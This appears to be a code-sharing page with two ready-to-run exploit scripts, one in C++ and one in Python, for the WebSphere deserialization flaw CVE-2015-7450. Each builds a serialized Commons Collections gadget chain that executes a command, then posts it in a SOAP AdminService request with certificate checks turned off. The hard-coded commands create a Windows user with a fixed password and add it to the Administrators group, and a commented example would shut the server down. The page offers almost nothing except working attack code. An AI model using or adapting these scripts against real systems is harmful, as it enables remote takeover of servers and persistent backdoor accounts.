2020-07-19 | C++ | UNLOCK

websphereCVE-2015-7450

C++

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
#define _CRT_SECURE_NO_WARNINGS 1
#define WINVER 0x0501
#define _WIN32_WINNT 0x0501
#include <stdio.h>
#include <winsock.h>
#include <winhttp.h>
#include <windows.h>
#include <string>
#pragma comment(lib, "winhttp.lib")

//using namespace std;
const char* base64char = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
const char padding_char = '=';

int base64_encode(const unsigned char* sourcedata, size_t sourcedata_len, char* base64)
{
int i = 0, j = 0;
unsigned char trans_index = 0; // 索引是8位,但是高两位都为0
//const int datalength = strlen((const char*)sourcedata);
const int datalength = sourcedata_len;
for (; i < datalength; i += 3) {
// 每三个一组,进行编码
// 要编码的数字的第一个
trans_index = ((sourcedata[i] >> 2) & 0x3f);
base64[j++] = base64char[(int)trans_index];
// 第二个
trans_index = ((sourcedata[i] << 4) & 0x30);
if (i + 1 < datalength) {
trans_index |= ((sourcedata[i + 1] >> 4) & 0x0f);
base64[j++] = base64char[(int)trans_index];
}
else {
base64[j++] = base64char[(int)trans_index];
base64[j++] = padding_char;
base64[j++] = padding_char;
break; // 超出总长度,可以直接break
}// 第三个
trans_index = ((sourcedata[i + 1] << 2) & 0x3c);
if (i + 2 < datalength) { // 有的话需要编码2个
trans_index |= ((sourcedata[i + 2] >> 6) & 0x03);
base64[j++] = base64char[(int)trans_index];
trans_index = sourcedata[i + 2] & 0x3f;
base64[j++] = base64char[(int)trans_index];
}
else {
base64[j++] = base64char[(int)trans_index];
base64[j++] = padding_char;
break;
}
}
base64[j] = '\0';
return 0;
}
int main(int argc,char* argv[]) {

if (argc < 3) {
printf("use:Websphere_soap_netlocalgroup.exe 192.168.168.168 8880\nUser:soaptest(*Administrators group)\nPassword:t00ls12455\nCVE-2015-7450\nhttps://www.exploit-db.com/exploits/41613");
}
else{
wchar_t ip[64];
LPWSTR lpwstr = ip;
int port = atoi(argv[2]);

MultiByteToWideChar(0, 0, argv[1], -1, ip, 64);
printf("Test[+]");
printf("%S\n", ip);
char command[] = "net localgroup administrators soaptest /add";


HINTERNET hSession;
HINTERNET hConnect;
HINTERNET hRequest;
BOOL bResults = FALSE;
DWORD dwFlags = SECURITY_FLAG_IGNORE_UNKNOWN_CA | SECURITY_FLAG_IGNORE_CERT_WRONG_USAGE | SECURITY_FLAG_IGNORE_CERT_CN_INVALID | SECURITY_FLAG_IGNORE_CERT_DATE_INVALID;

hSession = WinHttpOpen(NULL, NULL, NULL, NULL, NULL);
hConnect = WinHttpConnect(hSession, ip, port, 0);
hRequest = WinHttpOpenRequest(hConnect, L"POST", L""/*(LPCWSTR)PATH*/, NULL, NULL, NULL, WINHTTP_FLAG_SECURE);

WinHttpSetOption(hRequest, WINHTTP_OPTION_SECURITY_FLAGS, &dwFlags, sizeof(dwFlags));

const wchar_t lpHeaders[] = L"Content-Type: text/xml; charset=utf-8\r\nSOAPAction: \"urn:AdminService\"\r\n";
unsigned char cc_start[] = { 172,237,0,5,115,114,0,50,115,117,110,46,114,101,102,108,101,99,116,46,97,110,110,111,116,97,116,105,111,110,46,65,110,110,111,116,97,116,105,111,110,73,110,118,111,99,97,116,105,111,110,72,97,110,100,108,101,114,85,202,245,15,21,203,126,165,2,0,2,76,0,12,109,101,109,98,101,114,86,97,108,117,101,115,116,0,15,76,106,97,118,97,47,117,116,105,108,47,77,97,112,59,76,0,4,116,121,112,101,116,0,17,76,106,97,118,97,47,108,97,110,103,47,67,108,97,115,115,59,120,112,115,125,0,0,0,1,0,13,106,97,118,97,46,117,116,105,108,46,77,97,112,120,114,0,23,106,97,118,97,46,108,97,110,103,46,114,101,102,108,101,99,116,46,80,114,111,120,121,225,39,218,32,204,16,67,203,2,0,1,76,0,1,104,116,0,37,76,106,97,118,97,47,108,97,110,103,47,114,101,102,108,101,99,116,47,73,110,118,111,99,97,116,105,111,110,72,97,110,100,108,101,114,59,120,112,115,113,0,126,0,0,115,114,0,42,111,114,103,46,97,112,97,99,104,101,46,99,111,109,109,111,110,115,46,99,111,108,108,101,99,116,105,111,110,115,46,109,97,112,46,76,97,122,121,77,97,112,110,229,148,130,158,121,16,148,3,0,1,76,0,7,102,97,99,116,111,114,121,116,0,44,76,111,114,103,47,97,112,97,99,104,101,47,99,111,109,109,111,110,115,47,99,111,108,108,101,99,116,105,111,110,115,47,84,114,97,110,115,102,111,114,109,101,114,59,120,112,115,114,0,58,111,114,103,46,97,112,97,99,104,101,46,99,111,109,109,111,110,115,46,99,111,108,108,101,99,116,105,111,110,115,46,102,117,110,99,116,111,114,115,46,67,104,97,105,110,101,100,84,114,97,110,115,102,111,114,109,101,114,48,199,151,236,40,122,151,4,2,0,1,91,0,13,105,84,114,97,110,115,102,111,114,109,101,114,115,116,0,45,91,76,111,114,103,47,97,112,97,99,104,101,47,99,111,109,109,111,110,115,47,99,111,108,108,101,99,116,105,111,110,115,47,84,114,97,110,115,102,111,114,109,101,114,59,120,112,117,114,0,45,91,76,111,114,103,46,97,112,97,99,104,101,46,99,111,109,109,111,110,115,46,99,111,108,108,101,99,116,105,111,110,115,46,84,114,97,110,115,102,111,114,109,101,114,59,189,86,42,241,216,52,24,153,2,0,0,120,112,0,0,0,5,115,114,0,59,111,114,103,46,97,112,97,99,104,101,46,99,111,109,109,111,110,115,46,99,111,108,108,101,99,116,105,111,110,115,46,102,117,110,99,116,111,114,115,46,67,111,110,115,116,97,110,116,84,114,97,110,115,102,111,114,109,101,114,88,118,144,17,65,2,177,148,2,0,1,76,0,9,105,67,111,110,115,116,97,110,116,116,0,18,76,106,97,118,97,47,108,97,110,103,47,79,98,106,101,99,116,59,120,112,118,114,0,17,106,97,118,97,46,108,97,110,103,46,82,117,110,116,105,109,101,0,0,0,0,0,0,0,0,0,0,0,120,112,115,114,0,58,111,114,103,46,97,112,97,99,104,101,46,99,111,109,109,111,110,115,46,99,111,108,108,101,99,116,105,111,110,115,46,102,117,110,99,116,111,114,115,46,73,110,118,111,107,101,114,84,114,97,110,115,102,111,114,109,101,114,135,232,255,107,123,124,206,56,2,0,3,91,0,5,105,65,114,103,115,116,0,19,91,76,106,97,118,97,47,108,97,110,103,47,79,98,106,101,99,116,59,76,0,11,105,77,101,116,104,111,100,78,97,109,101,116,0,18,76,106,97,118,97,47,108,97,110,103,47,83,116,114,105,110,103,59,91,0,11,105,80,97,114,97,109,84,121,112,101,115,116,0,18,91,76,106,97,118,97,47,108,97,110,103,47,67,108,97,115,115,59,120,112,117,114,0,19,91,76,106,97,118,97,46,108,97,110,103,46,79,98,106,101,99,116,59,144,206,88,159,16,115,41,108,2,0,0,120,112,0,0,0,2,116,0,10,103,101,116,82,117,110,116,105,109,101,117,114,0,18,91,76,106,97,118,97,46,108,97,110,103,46,67,108,97,115,115,59,171,22,215,174,203,205,90,153,2,0,0,120,112,0,0,0,0,116,0,9,103,101,116,77,101,116,104,111,100,117,113,0,126,0,30,0,0,0,2,118,114,0,16,106,97,118,97,46,108,97,110,103,46,83,116,114,105,110,103,160,240,164,56,122,59,179,66,2,0,0,120,112,118,113,0,126,0,30,115,113,0,126,0,22,117,113,0,126,0,27,0,0,0,2,112,117,113,0,126,0,27,0,0,0,0,116,0,6,105,110,118,111,107,101,117,113,0,126,0,30,0,0,0,2,118,114,0,16,106,97,118,97,46,108,97,110,103,46,79,98,106,101,99,116,0,0,0,0,0,0,0,0,0,0,0,120,112,118,113,0,126,0,27,115,113,0,126,0,22,117,114,0,19,91,76,106,97,118,97,46,108,97,110,103,46,83,116,114,105,110,103,59,173,210,86,231,233,29,123,71,2,0,0,120,112,0,0,0,1,116,0 };
unsigned char cc_end[] = { 116,0,4,101,120,101,99,117,113,0,126,0,30,0,0,0,1,113,0,126,0,35,115,113,0,126,0,17,115,114,0,17,106,97,118,97,46,108,97,110,103,46,73,110,116,101,103,101,114,18,226,160,164,247,129,135,56,2,0,1,73,0,5,118,97,108,117,101,120,114,0,16,106,97,118,97,46,108,97,110,103,46,78,117,109,98,101,114,134,172,149,29,11,148,224,139,2,0,0,120,112,0,0,0,1,115,114,0,17,106,97,118,97,46,117,116,105,108,46,72,97,115,104,77,97,112,5,7,218,193,195,22,96,209,3,0,2,70,0,10,108,111,97,100,70,97,99,116,111,114,73,0,9,116,104,114,101,115,104,111,108,100,120,112,63,64,0,0,0,0,0,0,119,8,0,0,0,16,0,0,0,0,120,120,118,114,0,18,106,97,118,97,46,108,97,110,103,46,79,118,101,114,114,105,100,101,0,0,0,0,0,0,0,0,0,0,0,120,112,113,0,126,0,58 };
unsigned char c_pld[sizeof(command) + 1];
for (int i = 2; i < sizeof(command) + 1; i++) {
c_pld[0] = '\0';
c_pld[1] = sizeof(command) - 1;
c_pld[i] = command[i - 2];
}
unsigned char newcpld[sizeof(cc_start) + sizeof(c_pld)];
for (int i = 0; i < sizeof(cc_start) - 1; i++) {
newcpld[i] = cc_start[i];
}
for (int i = sizeof(cc_start) - 1; i < (sizeof(cc_start) + sizeof(c_pld)) - 1; i++) {
newcpld[i] = c_pld[i - sizeof(cc_start) + 1];
}
unsigned char inject_payload[sizeof(newcpld) + sizeof(cc_end) - 1];
for (int i = 0; i < sizeof(newcpld) - 1; i++) {
inject_payload[i] = newcpld[i];
}
for (int i = sizeof(newcpld) - 1; i < (sizeof(newcpld) + sizeof(cc_end)) - 1; i++) {
inject_payload[i] = cc_end[i - sizeof(newcpld) + 1];
}
char send[12455];
base64_encode(inject_payload, sizeof(inject_payload), send);
char exec_s[12455] = "<?xml version='1.0' encoding='UTF-8'?><SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\"><SOAP-ENV:Header xmlns:ns0=\"admin\" ns0:WASRemoteRuntimeVersion=\"7.0.0.0\" ns0:JMXMessageVersion=\"1.0.0\" ns0:SecurityEnabled=\"true\" ns0:JMXVersion=\"1.2.0\"><LoginMethod>BasicAuth</LoginMethod></SOAP-ENV:Header><SOAP-ENV:Body><ns1:getAttribute xmlns:ns1=\"urn:AdminService\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><objectname xsi:type=\"ns1:javax.management.ObjectName\">";
char exec_e[] = "</objectname><attribute xsi:type=\"xsd:string\">ringBufferSize</attribute></ns1:getAttribute></SOAP-ENV:Body></SOAP-ENV:Envelope>";
strcat(exec_s, send);
strcat(exec_s, exec_e);
LPSTR pszData = exec_s;

WinHttpSendRequest(hRequest, lpHeaders/*(LPCWSTR)Headers*/, NULL, FALSE, NULL, (DWORD)strlen(pszData), NULL);
WinHttpWriteData(hRequest, pszData/*(LPCVOID)LPSTR POST data*/, (DWORD)strlen(pszData), NULL);
bResults = WinHttpReceiveResponse(hRequest, NULL);

DWORD dwSize = 0;
DWORD dwDownloaded = 0;
LPSTR pszOutBuffer;
WinHttpQueryDataAvailable(hRequest, &dwSize);
pszOutBuffer = new char[dwSize + 1];
ZeroMemory(pszOutBuffer, dwSize + 1);
WinHttpReadData(hRequest, (LPVOID)pszOutBuffer, dwSize, &dwDownloaded);
printf("Res\n\n%s", pszOutBuffer);

WinHttpCloseHandle(hSession);
WinHttpCloseHandle(hConnect);
WinHttpCloseHandle(hRequest);
}
return 0;
}

Python

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
#https://www.exploit-db.com/exploits/41613
import requests
import base64

def payload(command):
serObj1 = b"\xac\xed\x00\x05sr\x002sun.reflect.annotation.AnnotationInvocationHandlerU\xca\xf5\x0f\x15\xcb~\xa5\x02\x00\x02L\x00\x0cmemberValuest\x00\x0fLjava/util/Map;L\x00\x04typet\x00\x11Ljava/lang/Class;xps}\x00\x00\x00\x01\x00\rjava.util.Mapxr\x00\x17java.lang.reflect.Proxy\xe1'\xda \xcc\x10C\xcb\x02\x00\x01L\x00\x01ht\x00%Ljava/lang/reflect/InvocationHandler;xpsq\x00~\x00\x00sr\x00*org.apache.commons.collections.map.LazyMapn\xe5\x94\x82\x9ey\x10\x94\x03\x00\x01L\x00\x07factoryt\x00,Lorg/apache/commons/collections/Transformer;xpsr\x00:org.apache.commons.collections.functors.ChainedTransformer0\xc7\x97\xec(z\x97\x04\x02\x00\x01[\x00\riTransformerst\x00-[Lorg/apache/commons/collections/Transformer;xpur\x00-[Lorg.apache.commons.collections.Transformer;\xbdV*\xf1\xd84\x18\x99\x02\x00\x00xp\x00\x00\x00\x05sr\x00;org.apache.commons.collections.functors.ConstantTransformerXv\x90\x11A\x02\xb1\x94\x02\x00\x01L\x00\tiConstantt\x00\x12Ljava/lang/Object;xpvr\x00\x11java.lang.Runtime\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00xpsr\x00:org.apache.commons.collections.functors.InvokerTransformer\x87\xe8\xffk{|\xce8\x02\x00\x03[\x00\x05iArgst\x00\x13[Ljava/lang/Object;L\x00\x0biMethodNamet\x00\x12Ljava/lang/String;[\x00\x0biParamTypest\x00\x12[Ljava/lang/Class;xpur\x00\x13[Ljava.lang.Object;\x90\xceX\x9f\x10s)l\x02\x00\x00xp\x00\x00\x00\x02t\x00\ngetRuntimeur\x00\x12[Ljava.lang.Class;\xab\x16\xd7\xae\xcb\xcdZ\x99\x02\x00\x00xp\x00\x00\x00\x00t\x00\tgetMethoduq\x00~\x00\x1e\x00\x00\x00\x02vr\x00\x10java.lang.String\xa0\xf0\xa48z;\xb3B\x02\x00\x00xpvq\x00~\x00\x1esq\x00~\x00\x16uq\x00~\x00\x1b\x00\x00\x00\x02puq\x00~\x00\x1b\x00\x00\x00\x00t\x00\x06invokeuq\x00~\x00\x1e\x00\x00\x00\x02vr\x00\x10java.lang.Object\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00xpvq\x00~\x00\x1bsq\x00~\x00\x16ur\x00\x13[Ljava.lang.String;\xad\xd2V\xe7\xe9\x1d{G\x02\x00\x00xp\x00\x00\x00\x01t\x00"
serObj1 += (chr(len(command))+command).encode()
serObj1 += b"t\x00\x04execuq\x00~\x00\x1e\x00\x00\x00\x01q\x00~\x00#sq\x00~\x00\x11sr\x00\x11java.lang.Integer\x12\xe2\xa0\xa4\xf7\x81\x878\x02\x00\x01I\x00\x05valuexr\x00\x10java.lang.Number\x86\xac\x95\x1d\x0b\x94\xe0\x8b\x02\x00\x00xp\x00\x00\x00\x01sr\x00\x11java.util.HashMap\x05\x07\xda\xc1\xc3\x16`\xd1\x03\x00\x02F\x00\nloadFactorI\x00\tthresholdxp?@\x00\x00\x00\x00\x00\x00w\x08\x00\x00\x00\x10\x00\x00\x00\x00xxvr\x00\x12java.lang.Override\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00xpq\x00~\x00:"
return base64.b64encode(serObj1).decode()


def exploit(url,command):
headers = {"Content-Type": "text/xml; charset=utf-8","SOAPAction": "\"urn:AdminService\" "}
data = "<?xml version='1.0' encoding='UTF-8'?>" + "\r\n" + "<SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\">" + "\r\n" + "<SOAP-ENV:Header xmlns:ns0=\"admin\" ns0:WASRemoteRuntimeVersion=\"7.0.0.0\" ns0:JMXMessageVersion=\"1.0.0\" ns0:SecurityEnabled=\"true\" ns0:JMXVersion=\"1.2.0\">" + "\r\n" + "<LoginMethod>BasicAuth</LoginMethod>" + "\r\n" + "</SOAP-ENV:Header>" + "\r\n" + "<SOAP-ENV:Body>" + "\r\n" + "<ns1:getAttribute xmlns:ns1=\"urn:AdminService\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">" + "\r\n" + "<objectname xsi:type=\"ns1:javax.management.ObjectName\">" + payload(command) + "</objectname>" + "\r\n" + "<attribute xsi:type=\"xsd:string\">ringBufferSize</attribute>" + "\r\n" + "</ns1:getAttribute>" + "\r\n" + "</SOAP-ENV:Body>" + "\r\n" + "</SOAP-ENV:Envelope>" + "\r\n"
try:
exp = requests.post(url,verify=False,headers=headers,data=data)
print(exp.text)
except :
pass
#usg:exploit("https://127.0.0.1:8880","shutdown -s -t 0")
exploit("https://192.168.43.73:8880","net user soaptest t00ls12455 /add")
exploit("https://192.168.43.73:8880","net localgroup administrators soaptest /add")
C++

评论加载中